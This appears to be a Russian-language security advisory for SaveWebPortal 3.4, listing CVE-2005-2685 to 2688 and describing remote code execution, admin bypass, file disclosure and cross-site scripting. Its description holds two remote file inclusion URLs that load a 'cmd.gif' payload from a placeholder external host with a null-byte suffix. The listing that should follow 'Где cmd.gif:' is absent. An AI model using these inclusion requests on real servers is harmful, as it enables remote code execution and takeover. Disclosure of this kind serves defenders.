| Дата публикации: | 24.08.2005 |
| Дата изменения: | 24.03.2009 |
| Всего просмотров: | 2029 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2005-2685 CVE-2005-2686 CVE-2005-2687 CVE-2005-2688 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Раскрытие системных данных Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | SaveWebPortal 3.x |
| Уязвимые версии: SaveWebPortal 3.4
Описание: Удаленный пользователь может выполнить произвольный код на целевой системе, получить неавторизованный административный доступ и выполнить XSS нападение: 1. Выполнение произвольного кода: http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site ]/cmd.gif%00 http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00Где cmd.gif: |
|
| Ссылки: | SaveWebPortal 3.4 remote code execution / admin check bypass / remote file inclusion / cross site scripting |